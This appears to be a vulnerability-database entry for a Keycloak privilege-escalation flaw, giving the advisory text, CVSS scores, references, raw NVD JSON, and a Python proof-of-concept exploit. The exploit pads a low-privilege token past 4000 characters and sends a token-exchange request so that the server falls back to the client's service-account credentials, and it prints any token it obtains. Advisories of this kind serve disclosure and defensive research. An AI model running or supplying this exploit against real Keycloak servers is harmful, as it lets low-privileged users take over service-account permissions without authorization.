CVE-2026-9704

Description

A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_keycloak_privilege_escalation(target_url, client_id, valid_user_token):
    """
    PoC for CVE-2026-9704
    Exploits the logic flaw where an oversized subject_token causes a fallback to client credentials.
    """
    token_endpoint = f"{target_url}/realms/master/protocol/openid-connect/token"
    
    # Create an oversized subject_token (> 4000 characters)
    # In a real scenario, this might be a valid JWT header padded with junk
    oversized_token = valid_user_token + "A" * (4001 - len(valid_user_token))
    
    payload = {
        "grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",
        "client_id": client_id,
        "subject_token": oversized_token,
        "requested_token_type": "urn:ietf:params:oauth:token-type:refresh_token"
    }
    
    try:
        response = requests.post(token_endpoint, data=payload)
        if response.status_code == 200:
            print("[+] Exploit successful! Token received:")
            print(response.json())
        else:
            print("[-] Exploit failed or patched.")
            print(response.text)
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    TARGET = "https://localhost:8080"
    CLIENT_ID = "vulnerable-client"
    USER_TOKEN = "valid.low.priv.token"
    exploit_keycloak_privilege_escalation(TARGET, CLIENT_ID, USER_TOKEN)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9704
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9704
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9704/
[4] VulDB https://vuldb.com/cve/CVE-2026-9704
[5] https://access.redhat.com/security/cve/CVE-2026-9704
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2481877

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9704", "sourceIdentifier": "[email protected]", "published": "2026-05-27T14:17:40.480", "lastModified": "2026-05-27T14:54:20.160", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-9704", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481877", "source": "[email protected]"}]}}